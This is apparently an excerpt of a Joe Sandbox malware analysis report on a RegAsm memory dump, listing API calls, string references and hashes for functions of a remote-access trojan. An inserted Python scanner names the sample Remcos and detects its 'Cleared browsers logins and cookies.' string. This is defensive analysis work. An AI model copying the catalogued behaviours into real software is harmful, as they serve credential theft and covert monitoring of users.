                                                                                                                                                                                                  • API String ID: 3123878439-4028850238
                                                                                                                                                                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                                  • API String ID: 1646373207-2714051624
                                                                                                                                                                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                  • API String ID: 2574300362-1519888992
                                                                                                                                                                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
• Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
• Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
• Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
• Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
• Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
• Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
• Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040C130
• [Cleared browsers logins and cookies.], xrefs: 0040C11F
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
• Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
• Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
• Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
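The two status strings referenced by the function above (xrefs 0040C11F and 0040C130) are a cheap triage indicator for the unpacked RegAsm image. The following scanner is an added example, not part of the Joe Sandbox report or of its plugin: it searches a raw memory dump for those strings in both ANSI and UTF-16LE form, reports each hit once even when the bare message sits inside its bracketed variant, and maps file offsets to virtual addresses assuming the dump is a contiguous image mapping from the report's base of 0x400000 (that base, and the sample dump bytes, are assumptions made here for illustration).

```python
import re
from typing import Any, Dict, List

# Strings taken from the function listing in the report.
REMCOS_STATUS_STRINGS = [
    "[Cleared browsers logins and cookies.]",
    "Cleared browsers logins and cookies.",
]

# Byte forms worth scanning for: narrow (ANSI) and wide (UTF-16LE) builds of the string.
ENCODINGS = ("ascii", "utf-16-le")


def find_status_strings(dump: bytes, image_base: int = 0x400000) -> List[Dict[str, Any]]:
    """Return every occurrence of a known Remcos status string in the dump.

    image_base is an assumption: it mirrors 'Offset: 00400000' of the RegAsm
    dump in the report and is only meaningful for a contiguous image mapping.
    """
    hits: List[Dict[str, Any]] = []
    # Longest strings first, so a bare message found inside its bracketed form
    # is reported once rather than twice.
    for s in sorted(REMCOS_STATUS_STRINGS, key=len, reverse=True):
        for enc in ENCODINGS:
            pattern = re.escape(s.encode(enc))
            for m in re.finditer(pattern, dump):
                nested = any(
                    h["encoding"] == enc and h["start"] <= m.start() and m.end() <= h["end"]
                    for h in hits
                )
                if nested:
                    continue
                hits.append({
                    "string": s,
                    "encoding": enc,
                    "start": m.start(),
                    "end": m.end(),
                    "va": image_base + m.start(),
                })
    hits.sort(key=lambda h: h["start"])
    return hits


def remcos_browser_clear_indicator(dump: bytes) -> bool:
    """Triage verdict: both the bracketed log line and the bare message are present."""
    found = {h["string"] for h in find_status_strings(dump)}
    return all(s in found for s in REMCOS_STATUS_STRINGS)


# Constructed sample dump (not from the report): three copies of the message
# separated by zero padding, the last one in UTF-16LE.
SAMPLE_DUMP = (
    b"\x00" * 0x10
    + b"[Cleared browsers logins and cookies.]\x00"                 # offset 0x10, ANSI
    + b"\x00" * 0x20
    + b"Cleared browsers logins and cookies.\x00"                   # offset 0x57, ANSI
    + b"\x00" * 8
    + "Cleared browsers logins and cookies.".encode("utf-16-le")    # offset 0x84, wide
    + b"\x00\x00"
)


if __name__ == "__main__":
    for hit in find_status_strings(SAMPLE_DUMP):
        print(f"{hit['va']:08X} {hit['encoding']:<9} {hit['string']}")
    print("browser-clear indicator:", remcos_browser_clear_indicator(SAMPLE_DUMP))
```

Run it against the `.sdmp` files the report links (read as bytes) and compare the reported virtual addresses with the xrefs above; a mismatch usually means the dump is not a flat image mapping and the base assumption must be adjusted.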
APIs
• EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
• EnumDisplayDevicesW.USER32(?), ref: 00419560
• EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
• EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DisplayEnum$Devices$Monitors
• String ID:
• API String ID: 1432082543-0
• Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
• Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
• Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
• Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
APIs
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000), ref: 10001D7D
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: File$CloseHandleReadSize
• String ID:
• API String ID: 3642004256-0
• Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
• Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
• Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
APIs
  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
• Sleep.KERNEL32(000001F4), ref: 0040A5AE
• Sleep.KERNEL32(00000064), ref: 0040A638
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
• Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
• Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
• Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
APIs
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• String ID:
• API String ID: 188215759-0
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0041C2C4
• CloseHandle.KERNEL32(00000000), ref: 0041C2CC
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
• GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
• GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
• GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
                                                                                                                                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045093D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450943
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045094C
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450955
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: dec51a3efd7bded7d617a6265d0dbd7c574832b93fdfeb293186f1478fd3d20a
                                                                                                                                                                                                  • Instruction ID: 6c466447fda19c259de864e8ec7a337f5d427e247863835a27fd62ee48361464
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec51a3efd7bded7d617a6265d0dbd7c574832b93fdfeb293186f1478fd3d20a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5D0C9FAD01204B7EB00F6F5889384D632C6E15304B520C46B90166103D67C9A00473A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                    • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1635606685-2084328917
                                                                                                                                                                                                  • Opcode ID: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
